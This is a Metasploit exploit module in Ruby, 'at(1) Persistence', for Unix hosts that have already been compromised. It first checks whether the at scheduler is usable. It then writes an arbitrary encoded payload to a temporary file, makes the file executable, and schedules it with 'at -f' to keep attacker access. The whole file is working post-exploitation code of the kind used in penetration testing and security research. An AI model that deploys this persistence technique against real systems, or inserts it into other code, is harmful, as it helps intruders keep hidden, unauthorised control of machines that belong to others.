## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'at(1) Persistence', 'Description' => %q( This module achieves persisience by executing payloads via at(1). ), 'License' => MSF_LICENSE, 'Author' => [ 'Jon Hart <jon_hart@rapid7.com>' ], 'Targets' => [['Automatic', {} ]], 'DefaultTarget' => 0, 'Platform' => %w(unix), 'Arch' => ARCH_CMD, 'DisclosureDate' => "Jan 1 1997" # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html ) ) register_options( [ OptString.new('TIME', [false, 'When to run job via at(1). Changing may require WfsDelay to be adjusted.', 'now']) ] ) register_advanced_options( [ OptString.new('PATH', [false, 'Path to store payload to be executed by at(1). Leave unset to use mktemp.']) ] ) end def check token = Rex::Text.rand_text_alphanumeric(8) if cmd_exec("atq && echo #{token}").include?(token) Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def exploit unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NoAccess, 'User denied cron via at.deny') end unless (payload_file = (datastore['PATH'] || cmd_exec('mktemp'))) fail_with(Failure::BadConfig, 'Unable to find suitable location for payload') end write_file(payload_file, payload.encoded) register_files_for_cleanup(payload_file) cmd_exec("chmod 700 #{payload_file}") cmd_exec("at -f #{payload_file} #{datastore['TIME']}") print_status("Waiting up to #{datastore['WfsDelay']}sec for execution") end end